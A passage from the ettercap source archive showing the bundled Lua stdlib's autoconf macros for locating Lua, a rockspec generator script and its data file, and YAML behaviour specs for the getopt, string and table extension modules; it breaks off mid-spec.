Check the path against the prefix. _ax_package_path=$_ax_reassembled if echo "$_ax_package_path" | grep "^$2" >/dev/null; then dnl Found it. ax_lua_prefixed_path=$_ax_package_path break fi done ]) dnl ========================================================================= dnl AX_LUA_HEADERS([ACTION-IF-FOUND], [ACTION-IF-NOT-FOUND]) dnl ========================================================================= AC_DEFUN([AX_LUA_HEADERS], [ dnl Check for LUA_VERSION. AC_MSG_CHECKING([if LUA_VERSION is defined]) AS_IF([test "x$LUA_VERSION" != 'x'], [AC_MSG_RESULT([yes])], [ AC_MSG_RESULT([no]) AC_MSG_ERROR([cannot check Lua headers without knowing LUA_VERSION]) ]) dnl Make LUA_INCLUDE a precious variable. AC_ARG_VAR([LUA_INCLUDE], [The Lua includes, e.g. -I/usr/include/lua5.1]) dnl Some default directories to search. LUA_SHORT_VERSION=`echo "$LUA_VERSION" | sed 's|\.||'` m4_define_default([_AX_LUA_INCLUDE_LIST], [ /usr/include/lua$LUA_VERSION \ /usr/include/lua/$LUA_VERSION \ /usr/include/lua$LUA_SHORT_VERSION \ /usr/local/include/lua$LUA_VERSION \ /usr/local/include/lua/$LUA_VERSION \ /usr/local/include/lua$LUA_SHORT_VERSION \ ]) dnl Try to find the headers. _ax_lua_saved_cppflags=$CPPFLAGS CPPFLAGS="$CPPFLAGS $LUA_INCLUDE" AC_CHECK_HEADERS([lua.h lualib.h lauxlib.h luaconf.h]) CPPFLAGS=$_ax_lua_saved_cppflags dnl Try some other directories if LUA_INCLUDE was not set. AS_IF([test "x$LUA_INCLUDE" = 'x' && test "x$ac_cv_header_lua_h" != 'xyes'], [ dnl Try some common include paths. for _ax_include_path in _AX_LUA_INCLUDE_LIST; do test ! -d "$_ax_include_path" && continue AC_MSG_CHECKING([for Lua headers in]) AC_MSG_RESULT([$_ax_include_path]) AS_UNSET([ac_cv_header_lua_h]) AS_UNSET([ac_cv_header_lualib_h]) AS_UNSET([ac_cv_header_lauxlib_h]) AS_UNSET([ac_cv_header_luaconf_h]) _ax_lua_saved_cppflags=$CPPFLAGS CPPFLAGS="$CPPFLAGS -I$_ax_include_path" AC_CHECK_HEADERS([lua.h lualib.h lauxlib.h luaconf.h]) CPPFLAGS=$_ax_lua_saved_cppflags AS_IF([test "x$ac_cv_header_lua_h" = 'xyes'], [ LUA_INCLUDE="-I$_ax_include_path" break ]) done ]) AS_IF([test "x$ac_cv_header_lua_h" = 'xyes'], [ dnl Make a program to print LUA_VERSION defined in the header. dnl TODO This probably shouldn't be a runtime test. AC_CACHE_CHECK([for Lua header version], [ax_cv_lua_header_version], [ _ax_lua_saved_cppflags=$CPPFLAGS CPPFLAGS="$CPPFLAGS $LUA_INCLUDE" AC_RUN_IFELSE( [ AC_LANG_SOURCE([[ #include #include #include int main(int argc, char ** argv) { if(argc > 1) printf("%s", LUA_VERSION); exit(EXIT_SUCCESS); } ]]) ], [ ax_cv_lua_header_version=`./conftest$EXEEXT p | \ sed "s|^Lua \(.*\)|\1|" | \ grep -o "^@<:@0-9@:>@\+\\.@<:@0-9@:>@\+"` ], [ax_cv_lua_header_version='unknown']) CPPFLAGS=$_ax_lua_saved_cppflags ]) dnl Compare this to the previously found LUA_VERSION. AC_MSG_CHECKING([if Lua header version matches $LUA_VERSION]) AS_IF([test "x$ax_cv_lua_header_version" = "x$LUA_VERSION"], [ AC_MSG_RESULT([yes]) ax_header_version_match='yes' ], [ AC_MSG_RESULT([no]) ax_header_version_match='no' ]) ]) dnl Was LUA_INCLUDE specified? AS_IF([test "x$ax_header_version_match" != 'xyes' && test "x$LUA_INCLUDE" != 'x'], [AC_MSG_ERROR([cannot find headers for specified LUA_INCLUDE])]) dnl Test the final result and run user code. AS_IF([test "x$ax_header_version_match" = 'xyes'], [$1], [m4_default([$2], [AC_MSG_ERROR([cannot find Lua includes])])]) ]) dnl AX_LUA_HEADERS_VERSION no longer exists, use AX_LUA_HEADERS. AC_DEFUN([AX_LUA_HEADERS_VERSION], [ AC_MSG_WARN([[$0 is deprecated, please use AX_LUA_HEADERS]]) ]) dnl ========================================================================= dnl AX_LUA_LIBS([ACTION-IF-FOUND], [ACTION-IF-NOT-FOUND]) dnl ========================================================================= AC_DEFUN([AX_LUA_LIBS], [ dnl TODO Should this macro also check various -L flags? dnl Check for LUA_VERSION. AC_MSG_CHECKING([if LUA_VERSION is defined]) AS_IF([test "x$LUA_VERSION" != 'x'], [AC_MSG_RESULT([yes])], [ AC_MSG_RESULT([no]) AC_MSG_ERROR([cannot check Lua libs without knowing LUA_VERSION]) ]) dnl Make LUA_LIB a precious variable. AC_ARG_VAR([LUA_LIB], [The Lua library, e.g. -llua5.1]) AS_IF([test "x$LUA_LIB" != 'x'], [ dnl Check that LUA_LIBS works. _ax_lua_saved_libs=$LIBS LIBS="$LIBS $LUA_LIB" AC_SEARCH_LIBS([lua_load], [], [_ax_found_lua_libs='yes'], [_ax_found_lua_libs='no']) LIBS=$_ax_lua_saved_libs dnl Check the result. AS_IF([test "x$_ax_found_lua_libs" != 'xyes'], [AC_MSG_ERROR([cannot find libs for specified LUA_LIB])]) ], [ dnl First search for extra libs. _ax_lua_extra_libs='' _ax_lua_saved_libs=$LIBS LIBS="$LIBS $LUA_LIB" AC_SEARCH_LIBS([exp], [m]) AC_SEARCH_LIBS([dlopen], [dl]) LIBS=$_ax_lua_saved_libs AS_IF([test "x$ac_cv_search_exp" != 'xno' && test "x$ac_cv_search_exp" != 'xnone required'], [_ax_lua_extra_libs="$_ax_lua_extra_libs $ac_cv_search_exp"]) AS_IF([test "x$ac_cv_search_dlopen" != 'xno' && test "x$ac_cv_search_dlopen" != 'xnone required'], [_ax_lua_extra_libs="$_ax_lua_extra_libs $ac_cv_search_dlopen"]) dnl Try to find the Lua libs. _ax_lua_saved_libs=$LIBS LIBS="$LIBS $LUA_LIB" AC_SEARCH_LIBS([lua_load], [lua$LUA_VERSION lua$LUA_SHORT_VERSION lua], [_ax_found_lua_libs='yes'], [_ax_found_lua_libs='no'], [$_ax_lua_extra_libs]) LIBS=$_ax_lua_saved_libs AS_IF([test "x$ac_cv_search_lua_load" != 'xno' && test "x$ac_cv_search_lua_load" != 'xnone required'], [LUA_LIB="$ac_cv_search_lua_load $_ax_lua_extra_libs"]) ]) dnl Test the result and run user code. AS_IF([test "x$_ax_found_lua_libs" = 'xyes'], [$1], [m4_default([$2], [AC_MSG_ERROR([cannot find Lua libs])])]) ]) dnl ========================================================================= dnl AX_LUA_READLINE([ACTION-IF-FOUND], [ACTION-IF-NOT-FOUND]) dnl ========================================================================= AC_DEFUN([AX_LUA_READLINE], [ AX_LIB_READLINE AS_IF([test "x$ac_cv_header_readline_readline_h" != 'x' && test "x$ac_cv_header_readline_history_h" != 'x'], [ LUA_LIBS_CFLAGS="-DLUA_USE_READLINE $LUA_LIBS_CFLAGS" $1 ], [$2]) ]) ettercap-0.8.3.1/src/lua/share/third-party/stdlib/m4/ax_with_prog.m4000664 000000 000000 00000004711 13711276346 025143 0ustar00rootroot000000 000000 # =========================================================================== # http://www.gnu.org/software/autoconf-archive/ax_with_prog.html # =========================================================================== # # SYNOPSIS # # AX_WITH_PROG([VARIABLE],[program],[VALUE-IF-NOT-FOUND],[PATH]) # # DESCRIPTION # # Locates an installed program binary, placing the result in the precious # variable VARIABLE. Accepts a present VARIABLE, then --with-program, and # failing that searches for program in the given path (which defaults to # the system path). If program is found, VARIABLE is set to the full path # of the binary; if it is not found VARIABLE is set to VALUE-IF-NOT-FOUND # if provided, unchanged otherwise. # # A typical example could be the following one: # # AX_WITH_PROG(PERL,perl) # # NOTE: This macro is based upon the original AX_WITH_PYTHON macro from # Dustin J. Mitchell . # # LICENSE # # Copyright (c) 2008 Francesco Salvestrini # Copyright (c) 2008 Dustin J. Mitchell # # Copying and distribution of this file, with or without modification, are # permitted in any medium without royalty provided the copyright notice # and this notice are preserved. This file is offered as-is, without any # warranty. #serial 16 AC_DEFUN([AX_WITH_PROG],[ AC_PREREQ([2.61]) pushdef([VARIABLE],$1) pushdef([EXECUTABLE],$2) pushdef([VALUE_IF_NOT_FOUND],$3) pushdef([PATH_PROG],$4) AC_ARG_VAR(VARIABLE,Absolute path to EXECUTABLE executable) AS_IF(test -z "$VARIABLE",[ AC_MSG_CHECKING(whether EXECUTABLE executable path has been provided) AC_ARG_WITH(EXECUTABLE,AS_HELP_STRING([--with-EXECUTABLE=[[[PATH]]]],absolute path to EXECUTABLE executable), [ AS_IF([test "$withval" != yes && test "$withval" != no],[ VARIABLE="$withval" AC_MSG_RESULT($VARIABLE) ],[ VARIABLE="" AC_MSG_RESULT([no]) AS_IF([test "$withval" != no], [ AC_PATH_PROG([]VARIABLE[],[]EXECUTABLE[],[]VALUE_IF_NOT_FOUND[],[]PATH_PROG[]) ]) ]) ],[ AC_MSG_RESULT([no]) AC_PATH_PROG([]VARIABLE[],[]EXECUTABLE[],[]VALUE_IF_NOT_FOUND[],[]PATH_PROG[]) ]) ]) popdef([PATH_PROG]) popdef([VALUE_IF_NOT_FOUND]) popdef([EXECUTABLE]) popdef([VARIABLE]) ]) ettercap-0.8.3.1/src/lua/share/third-party/stdlib/mkrockspecs.lua000664 000000 000000 00000002517 13711276346 024720 0ustar00rootroot000000 000000 -- Generate rockspecs from a prototype with variants require "std" if select ("#", ...) < 2 then io.stderr:write "Usage: mkrockspecs PACKAGE VERSION\n" os.exit () end package_name = select (1, ...) version = select (2, ...) function format (x, indent) indent = indent or "" if type (x) == "table" then local s = "{\n" for i, v in pairs (x) do if type (i) ~= "number" then s = s..indent..i.." = "..format (v, indent.." ")..",\n" end end for i, v in ipairs (x) do s = s..indent..format (v, indent.." ")..",\n" end return s..indent:sub (1, -3).."}" elseif type (x) == "string" then return string.format ("%q", x) else return tostring (x) end end for f, spec in pairs (loadfile ("rockspecs.lua") ()) do if f ~= "default" then local specfile = package_name.."-"..(f ~= "" and f:lower ().."-" or "")..version.."-2.rockspec" h = io.open (specfile, "w") assert (h) flavour = f -- a global, visible in loadfile local specs = loadfile ("rockspecs.lua") () -- reload to get current flavour interpolated local spec = tree.merge (tree.new (specs.default), tree.new (specs[f])) local s = "" for i, v in pairs (spec) do s = s..i.." = "..format (v, " ").."\n" end h:write (s) h:close () os.execute ("luarocks lint " .. specfile) end end ettercap-0.8.3.1/src/lua/share/third-party/stdlib/rockspecs.lua000664 000000 000000 00000002141 13711276346 024361 0ustar00rootroot000000 000000 -- Rockspec data -- Variables to be interpolated: -- -- package -- version local version_dashed = version:gsub ("%.", "-") local default = { package = package_name, version = version.."-2", source = { url = "git://github.com/rrthomas/lua-stdlib.git", }, description = { summary = "General Lua libraries", detailed = [[ stdlib is a library of modules for common programming tasks, including list, table and functional operations, regexps, objects, pickling, pretty-printing and getopt. ]], homepage = "http://github.com/rrthomas/lua-stdlib/", license = "MIT/X11", }, dependencies = { "lua >= 5.1", }, build = { type = "command", build_command = "LUA=$(LUA) LUA_INCLUDE=$(LUA_INCDIR) ./configure --prefix=$(PREFIX) --libdir=$(LIBDIR) --datadir=$(LUADIR) && make clean && make", install_command = "make install", copy_directories = {}, }, } if version ~= "git" then default.source.branch = "release-v"..version_dashed else default.build.build_command = "autoreconf -i && " .. default.build.build_command end return {default=default, [""]={}} ettercap-0.8.3.1/src/lua/share/third-party/stdlib/specs/000775 000000 000000 00000000000 13711276346 023001 5ustar00rootroot000000 000000 ettercap-0.8.3.1/src/lua/share/third-party/stdlib/specs/getopt_spec.yaml000664 000000 000000 00000005366 13711276346 026213 0ustar00rootroot000000 000000 specify getopt: - before: getopt = require "getopt" - "describe getopt.getOpt": - before: | prog = { name = "getopt_spec.lua", options = { {{"verbose", "v"}, "verbosely list files"}, {{"output", "o"}, "dump to FILE", "Opt", "FILE"}, {{"name", "n"}, "only dump USER's files", "Req", "USER"}, } } function test (cmdLine, stop_at_nonopt) local nonOpts, opts, errors = getopt.getOpt (cmdLine, prog.options, stop_at_nonopt) if #errors == 0 then return { options = opts, args = nonOpts } else return errors end end getopt.processArgs (prog) - it recognizes a user defined option: expect (test {"foo", "-v"}).should_equal ( { options = { verbose = {1}}, args = { "foo" } }) - "it treats -- as the end of the option list": expect (test {"foo", "--", "-v"}).should_equal ( { options = {}, args = { "foo", "-v" } }) - it captures a list of repeated option arguments: expect (test {"-o", "-V", "-name", "bar", "--name=baz"}).should_equal ( { options = { name = {"bar", "baz"}, version = {1}, output = {1}}, args = {} }) - it diagnoses unrecognized options: expect (test {"-foo"}).should_contain "unrecognized option `-foo'" - it stops option parsing at the first non-option if told to: expect (test ({"foo", "-bar"}, true)).should_equal ( { options = {}, args = {"foo", "-bar"} }) - "describe getopt.usageInfo": - context when specifying options: - before: helppatt = "%-h, %-%-help%s+print this help, then exit" versionpatt = "%-V, %-%-version%s+print version information, then exit" prog = { name = "getopt_spec.lua", options = {} } options = { {{"help", "?"}, "display this help"}, {{"version"}, "display version number"} } f = getopt.usageInfo - it provides a default version option: getopt.processArgs (prog) expect (f ("", prog.options)).should_match (versionpatt) - it allows the user to override the version option: prog.options = options getopt.processArgs (prog) expect (f ("", prog.options)).should_not_match (versionpatt) expect (f ("", prog.options)).should_match (" %-%-version%s+display") - it provides a default help option: getopt.processArgs (prog) expect (f ("", prog.options)).should_match (helppatt) - it allows the user to override the help option: prog.options = options getopt.processArgs (prog) expect (f ("", prog.options)).should_not_match (helppatt) expect (f ("", prog.options)).should_match ("%-%?, %-%-help%s+display") ettercap-0.8.3.1/src/lua/share/third-party/stdlib/specs/package_ext_spec.yaml000664 000000 000000 00000002134 13711276346 027152 0ustar00rootroot000000 000000 specify package_ext: - before: unextended = require "package_ext" - context when requiring the module: - before: | -- do not try to check all the entries in unextended package, -- because they naturally change as modules are loaded. apis = { "config", "cpath", "loaders", "loadlib", "preload", "searchers", "searchpath", "seeall" } - it returns the unextended package table: expect (unextended.config).should_be (package.config) expect (unextended.dirsep).should_be (nil) expect (unextended.pathsep).should_be (nil) expect (unextended.path_mark).should_be (nil) expect (unextended.execdir).should_be (nil) expect (unextended.igmark).should_be (nil) - "it splits package.config up": expect (string.format ("%s\n%s\n%s\n%s\n%s\n", package.dirsep, package.pathsep, package.path_mark, package.execdir, package.igmark) ).should_contain (package.config) - it does not override any other module access points: for _, api in ipairs (apis) do expect (package[api]).should_be (unextended[api]) end ettercap-0.8.3.1/src/lua/share/third-party/stdlib/specs/string_ext_spec.yaml000664 000000 000000 00000036450 13711276346 027075 0ustar00rootroot000000 000000 specify string_ext: - before: unextended = require "string_ext" subject = "a string \n\n" - "describe .. operator": - it concatenates string arguments: target = "a string \n\n another string" expect (subject .. " another string").should_be (target) - "it stringifies non-string arguments": argument = { "a table" } expect (subject .. argument).should_match (string.format ("%s{1=a table}", subject)) - it stringifies nil arguments: argument = nil expect (subject .. argument).should_be (string.format ("%s%s", subject, tostring (argument))) - the original subject is not perturbed: original = subject newstring = subject .. " concatenate something" expect (subject).should_be (original) - "describe string.caps ()": - before: f = string.caps - it capitalises words of a string: target = "A String \n\n" expect (f (subject)).should_be (target) - it changes only the first letter of each word: expect (f "a stRiNg").should_be "A StRiNg" - the original subject is not perturbed: original = subject newstring = f (subject) expect (subject).should_be (original) - "it diagnoses non-string arguments": expect ("string expected").should_error (f, nil) expect ("string expected").should_error (f, { "a table" }) - "describe string.chomp ()": - before: f = string.chomp - it removes a single trailing newline from a string: target = "a string \n" expect (f (subject)).should_be (target) - it does not change a string with no trailing newline: subject = "a string " expect (f (subject)).should_be (subject) - the original subject is not perturbed: original = subject newstring = f (subject) expect (subject).should_be (original) - "it diagnoses non-string arguments": expect ("string expected").should_error (f, nil) expect ("string expected").should_error (f, { "a table" }) - "describe string.escape_pattern ()": - before: f = string.escape_pattern - "it inserts a % before any non-alphanumeric in a string": subject, target = "", "" for c = 32, 126 do s = string.char (c) subject = subject .. s if s:match ("%W") then target = target .. "%" end target = target .. s end expect (f (subject)).should_be (target) - legacy escapePattern call is the same function: expect (string.escapePattern).should_be (f) - the original subject is not perturbed: original = subject newstring = f (subject) expect (subject).should_be (original) - "it diagnoses non-string arguments": expect ("string expected").should_error (f, nil) expect ("string expected").should_error (f, { "a table" }) - "describe string.escape_shell ()": - before: f = string.escape_shell - "it inserts a \\ before any shell metacharacters": subject, target = "", "" for c = 32, 126 do s = string.char (c) subject = subject .. s if s:match ("[][ ()\\\"']") then target = target .. "\\" end target = target .. s end expect (f (subject)).should_be (target) - legacy escapeShell call is the same function: expect (string.escapeShell).should_be (f) - the original subject is not perturbed: original = subject newstring = f (subject) expect (subject).should_be (original) - "it diagnoses non-string arguments": expect ("string expected").should_error (f, nil) expect ("string expected").should_error (f, { "a table" }) - "describe string.finds ()": - before: subject = "abcd" f = string.finds - it creates a list of pattern captures: target = { { 1, 2; capt = { "a", "b" } }, { 3, 4; capt = { "c", "d" } } } expect ({f (subject, "(.)(.)")}).should_equal ({ target }) - it creates an empty list where no captures are matched: target = {} expect ({f (subject, "(x)")}).should_equal ({ target }) - it creates an empty list for a pattern without captures: target = { { 1, 1; capt = {} } } expect ({f (subject, "a")}).should_equal ({ target }) - it starts the search at a specified index into the subject: target = { { 8, 9; capt = { "a", "b" } }, { 10, 11; capt = { "c", "d" } } } expect ({f ("garbage" .. subject, "(.)(.)", 8)}).should_equal ({ target }) - the original subject is not perturbed: original = subject newstring = f (subject, "...") expect (subject).should_be (original) - "it diagnoses non-string arguments": expect ("string expected").should_error (f, nil) expect ("string expected").should_error (f, { "a table" }) # FIXME: This looks like a misfeature to me, let's remove it! - "describe string.format ()": - before: | subject = "string: %s, number: %d" f = string.format - it returns a single argument without attempting formatting: expect (f (subject)).should_be (subject) - the original subject is not perturbed: original = subject newstring = f (subject) expect (subject).should_be (original) - "it diagnoses non-string arguments": expect ("string expected").should_error (f, nil, "arg") expect ("string expected").should_error (f, { "a table" }, "arg") - "describe string.ltrim ()": - before: subject = " \t\r\n a short string \t\r\n " f = string.ltrim - it removes whitespace from the start of a string: target = "a short string \t\r\n " expect (f (subject)).should_equal (target) - it supports custom removal patterns: target = "\r\n a short string \t\r\n " expect (f (subject, "[ \t\n]+")).should_equal (target) - the original subject is not perturbed: original = subject newstring = f (subject, "%W") expect (subject).should_be (original) - "it diagnoses non-string arguments": expect ("string expected").should_error (f, nil) expect ("string expected").should_error (f, { "a table" }) - "describe string.numbertosi ()": - before: f = string.numbertosi - it returns a number using SI suffixes: target = {"1e-9", "1y", "1z", "1a", "1f", "1p", "1n", "1mu", "1m", "1", "1k", "1M", "1G", "1T", "1P", "1E", "1Z", "1Y", "1e9"} subject = {} for n = -28, 28, 3 do m = 10 * (10 ^ n) table.insert (subject, f (m)) end expect (subject).should_equal (target) - it coerces string arguments to a number: expect (f "1000").should_be "1k" - "it diagnoses non-numeric arguments": expect ("attempt to perform arithmetic").should_error (f, nil) expect ("number expected").should_error (f, { "a table" }) - "describe string.ordinal_suffix ()": - before: f = string.ordinal_suffix - it returns the English suffix for a number: subject, target = {}, {} for n = -120, 120 do suffix = "th" m = math.abs (n) % 10 if m == 1 and math.abs (n) % 100 ~= 11 then suffix = "st" elseif m == 2 and math.abs (n) % 100 ~= 12 then suffix = "nd" elseif m == 3 and math.abs (n) % 100 ~= 13 then suffix = "rd" end table.insert (target, n .. suffix) table.insert (subject, n .. f (n)) end expect (subject).should_equal (target) - legacy ordinalSuffix call is the same function: expect (string.ordinalSuffix).should_be (f) - it coerces string arguments to a number: expect (f "-91").should_be "st" - "it diagnoses non-numeric arguments": expect ("number expected").should_error (f, nil) expect ("number expected").should_error (f, { "a table" }) - "describe string.pad ()": - before: width = 20 f = string.pad - context when string is shorter than given width: - before: subject = "short string" - it right pads a string to the given width with spaces: target = "short string " expect (f (subject, width)).should_be (target) - it left pads a string to the given negative width with spaces: width = -width target = " short string" expect (f (subject, width)).should_be (target) - context when string is longer than given width: - before: subject = "a string that's longer than twenty characters" - it truncates a string to the given width: target = "a string that's long" expect (f (subject, width)).should_be (target) - it left pads a string to given width with spaces: width = -width target = "an twenty characters" expect (f (subject, width)).should_be (target) - the original subject is not perturbed: original = subject newstring = f (subject, width) expect (subject).should_be (original) - "it coerces non-string arguments to a string": expect (f ({ "a table" }, width)).should_contain "a table" - "it diagnoses non-numeric width arguments": expect ("number expected").should_error (f, subject, nil) expect ("number expected").should_error (f, subject, { "a table" }) - "describe string.rtrim ()": - before: subject = " \t\r\n a short string \t\r\n " f = string.rtrim - it removes whitespace from the end of a string: target = " \t\r\n a short string" expect (f (subject)).should_equal (target) - it supports custom removal patterns: target = " \t\r\n a short string \t\r" expect (f (subject, "[ \t\n]+")).should_equal (target) - the original subject is not perturbed: original = subject newstring = f (subject, "%W") expect (subject).should_be (original) - "it diagnoses non-string arguments": expect ("string expected").should_error (f, nil) expect ("string expected").should_error (f, { "a table" }) - "describe string.split ()": - before: target = { "first", "the second one", "final entry" } subject = table.concat (target, ", ") f = string.split - it makes a table of substrings delimitied by a separator: expect (f (subject, ", ")).should_equal (target) - the original subject is not perturbed: original = subject newstring = f (subject, "e") expect (subject).should_be (original) - "it diagnoses non-string arguments": expect ("string expected").should_error (f, "a string", nil) expect ("string expected").should_error (f, nil, ",") expect ("string expected").should_error (f, { "a table" }, ",") - "describe string.tfind ()": - before: subject = "abc" f = string.tfind - it creates a list of pattern captures: target = { 1, 3, { "a", "b", "c" } } expect ({f (subject, "(.)(.)(.)")}).should_equal (target) - it creates an empty list where no captures are matched: target = { nil, nil, {} } expect ({f (subject, "(x)(y)(z)")}).should_equal (target) - it creates an empty list for a pattern without captures: target = { 1, 1, {} } expect ({f (subject, "a")}).should_equal (target) - it starts the search at a specified index into the subject: target = { 8, 10, { "a", "b", "c" } } expect ({f ("garbage" .. subject, "(.)(.)(.)", 8)}).should_equal (target) - the original subject is not perturbed: original = subject newstring = f (subject, "...") expect (subject).should_be (original) - "it diagnoses non-string arguments": expect ("string expected").should_error (f, nil) expect ("string expected").should_error (f, { "a table" }) - "describe string.trim ()": - before: subject = " \t\r\n a short string \t\r\n " f = string.trim - it removes whitespace from each end of a string: target = "a short string" expect (f (subject)).should_equal (target) - it supports custom removal patterns: target = "\r\n a short string \t\r" expect (f (subject, "[ \t\n]+")).should_equal (target) - the original subject is not perturbed: original = subject newstring = f (subject, "%W") expect (subject).should_be (original) - "it diagnoses non-string arguments": expect ("string expected").should_error (f, nil) expect ("string expected").should_error (f, { "a table" }) - "describe string.wrap ()": - before: subject = "This is a collection of Lua libraries for Lua 5.1 " .. "and 5.2. The libraries are copyright by their authors 2000" .. "-2013 (see the AUTHORS file for details), and released und" .. "er the MIT license (the same license as Lua itself). There" .. " is no warranty." f = string.wrap - it inserts newlines to wrap a string: target = "This is a collection of Lua libraries for Lua 5.1 a" .. "nd 5.2. The libraries are\ncopyright by their authors 2000" .. "-2013 (see the AUTHORS file for details), and\nreleased un" .. "der the MIT license (the same license as Lua itself). Ther" .. "e is no\nwarranty." expect (f (subject)).should_be (target) - it honours a column width parameter: target = "This is a collection of Lua libraries for Lua 5.1 a" .. "nd 5.2. The libraries\nare copyright by their authors 2000" .. "-2013 (see the AUTHORS file for\ndetails), and released un" .. "der the MIT license (the same license as Lua\nitself). The" .. "re is no warranty." expect (f (subject, 72)).should_be (target) - it supports indenting by a fixed number of columns: target = " This is a collection of Lua libraries for L" .. "ua 5.1 and 5.2. The\n libraries are copyright by th" .. "eir authors 2000-2013 (see the\n AUTHORS file for d" .. "etails), and released under the MIT license\n (the " .. "same license as Lua itself). There is no warranty." expect (f (subject, 72, 8)).should_be (target) - it can indent the first line differently: target = " This is a collection of Lua libraries for Lua 5" .. ".1 and 5.2.\n The libraries are copyright by their author" .. "s 2000-2013 (see\n the AUTHORS file for details), and rel" .. "eased under the MIT\n license (the same license as Lua it" .. "self). There is no\n warranty." expect (f (subject, 64, 2, 4)).should_be (target) - the original subject is not perturbed: original = subject newstring = f (subject, 55, 5) expect (subject).should_be (original) - it diagnoses indent greater than line width: expect ("less than the line width").should_error (f, subject, 10, 12) expect ("less than the line width").should_error (f, subject, 99, 99) - it diagnoses non-string arguments: expect ("string expected").should_error (f, nil) expect ("string expected").should_error (f, { "a table" }) - context when requiring the module: - before: extensions = { "caps", "chomp", "escape_pattern", "escape_shell", "finds", "format", "ltrim", "numbertosi", "ordinal_suffix", "pad", "rtrim", "split", "tfind", "trim", "wrap" } - it returns the unextended module table: for _, api in ipairs (extensions) do if api ~= "format" then expect (unextended[api]).should_be (nil) end end - it injects an enhanced format function: expect (unextended.format).should_not_be (table.format) - it does not override any other module access points: for api in pairs (unextended) do if api ~= "format" then expect (string[api]).should_be (unextended[api]) end end ettercap-0.8.3.1/src/lua/share/third-party/stdlib/specs/table_ext_spec.yaml000664 000000 000000 00000020622 13711276346 026650 0ustar00rootroot000000 000000 specify table_ext: - before: unextended = require "table_ext" - "describe table.clone ()": - before: subject = { k1 = {"v1"}, k2 = {"v2"}, k3 = {"v3"} } f = table.clone - it does not just return the subject: expect (f (subject)).should_not_be (subject) - it does copy the subject: expect (f (subject)).should_equal (subject) - it only makes a shallow copy: expect (f (subject).k1).should_be (subject.k1) - the original subject is not perturbed: target = { k1 = subject.k1, k2 = subject.k2, k3 = subject.k3 } copy = f (subject) expect (subject).should_equal (target) expect (subject).should_be (subject) - "it diagnoses non-table arguments": expect ("table expected").should_error (f, nil) expect ("table expected").should_error (f, "foo") - "describe table.clone_rename()": - before: subject = { k1 = {"v1"}, k2 = {"v2"}, k3 = {"v3"} } f = table.clone_rename - it does not just return the subject: expect (f ({}, subject)).should_not_be (subject) - it copies the subject: expect (f ({}, subject)).should_equal (subject) - it only makes a shallow copy: expect (f ({}, subject).k2).should_be (subject.k2) - context when renaming some keys: - before: target = { newkey = subject.k1, k2 = subject.k2, k3 = subject.k3 } - it renames during cloning: expect (f ({k1 = "newkey"}, subject)).should_equal (target) - it does not perturb the value in the renamed key field: expect (f ({k1 = "newkey"}, subject).newkey).should_be (subject.k1) - "it diagnoses non-table arguments": expect ("table expected").should_error (f, {}, nil) expect ("table expected").should_error (f, {}, "foo") - "describe table.empty ()": - before: f = table.empty - it returns true for an empty table: expect (f {}).should_be (true) expect (f {nil}).should_be (true) - "it returns false for a non-empty table": expect (f {"stuff"}).should_be (false) expect (f {{}}).should_be (false) expect (f {false}).should_be (false) - "it diagnoses non-table arguments": expect ("table expected").should_error (f, nil) expect ("table expected").should_error (f, "foo") - "describe table.invert ()": - before: subject = { k1 = 1, k2 = 2, k3 = 3 } f = table.invert - it returns a new table: expect (f (subject)).should_not_be (subject) - it inverts keys and values in the returned table: expect (f (subject)).should_equal { "k1", "k2", "k3" } - it is reversible: expect (f (f (subject))).should_equal (subject) - "it seems to copy a list of 1..n numbers": subject = { 1, 2, 3 } expect (f (subject)).should_equal (subject) expect (f (subject)).should_not_be (subject) - "it diagnoses non-table arguments": expect ("table expected").should_error (f, nil) expect ("table expected").should_error (f, "foo") - "describe table.keys ()": - before: subject = { k1 = 1, k2 = 2, k3 = 3 } f = table.keys - it returns an empty list when subject is empty: expect (f {}).should_equal {} - it makes a list of table keys: cmp = function (a, b) return a < b end expect (table.sort (f (subject), cmp)).should_equal {"k1", "k2", "k3"} - it does not guarantee stable ordering: subject = {} -- is this a good test? there is a vanishingly small possibility the -- returned table will have all 10000 keys in the same order... for i = 10000, 1, -1 do table.insert (subject, i) end expect (f (subject)).should_not_equal (subject) - "it diagnoses non-table arguments": expect ("table expected").should_error (f, nil) expect ("table expected").should_error (f, "foo") - "describe table.merge ()": - before: | -- Additional merge keys which are moderately unusual t1 = { k1 = {"v1"}, k2 = "if", k3 = {"?"} } t2 = { ["if"] = true, [{"?"}] = false, _ = "underscore", k3 = t1.k1 } f = table.merge target = {} for k, v in pairs (t1) do target[k] = v end for k, v in pairs (t2) do target[k] = v end - it does not create a whole new table: expect (f (t1, t2)).should_be (t1) - it does not change t1 when t2 is empty: expect (f (t1, {})).should_be (t1) - it copies t2 when t1 is empty: expect (f ({}, t1)).should_not_be (t1) expect (f ({}, t1)).should_equal (t1) - it merges keys from t2 into t1: expect (f (t1, t2)).should_equal (target) - it gives precedence to values from t2: original = table.clone (t1) m = f (t1, t2) -- Merge is destructive, do it once only. expect (m.k3).should_be (t2.k3) expect (m.k3).should_not_be (original.k3) - "it diagnoses non-table arguments": expect ("table expected").should_error (f, nil, nil) expect ("table expected").should_error (f, "foo", "bar") - "describe table.new ()": - before: f = table.new - context when not setting a default: - before: default = nil - it returns a new table when nil is passed: expect (f (default, nil)).should_equal {} - it returns any table passed in: t = { "unique table" } expect (f (default, t)).should_be (t) - context when setting a default: - before: default = "default" - it returns a new table when nil is passed: expect (f (default, nil)).should_equal {} - it returns any table passed in: t = { "unique table" } expect (f (default, t)).should_be (t) - it returns the stored value for existing keys: t = f ("default") v = { "unique value" } t[1] = v expect (t[1]).should_be (v) - it returns the constructor default for unset keys: t = f ("default") expect (t[1]).should_be "default" - it returns the actual default object: default = { "unique object" } t = f (default) expect (t[1]).should_be (default) - "it diagnoses non-tables/non-nil in the second argument": expect ("table expected").should_error (f, nil, "foo") - "describe table.size ()": - before: | -- - 1 - --------- 2 ---------- -- 3 -- subject = { "one", { { "two" }, "three" }, four = 5 } f = table.size - it counts the number of keys in a table: expect (f (subject)).should_be (3) - it counts no keys in an empty table: expect (f {}).should_be (0) - "it diagnoses non-table arguments": expect ("table expected").should_error (f, nil) expect ("table expected").should_error (f, "foo") - "describe table.sort ()": - before: subject = { 5, 2, 4, 1, 0, 3 } target = { 0, 1, 2, 3, 4, 5 } cmp = function (a, b) return a < b end f = table.sort - it sorts elements in place: f (subject, cmp) expect (subject).should_equal (target) - it returns the sorted table: expect (f (subject, cmp)).should_equal (target) - "it diagnoses non-table arguments": expect ("table expected").should_error (f, nil) expect ("table expected").should_error (f, nil) - "describe table.values 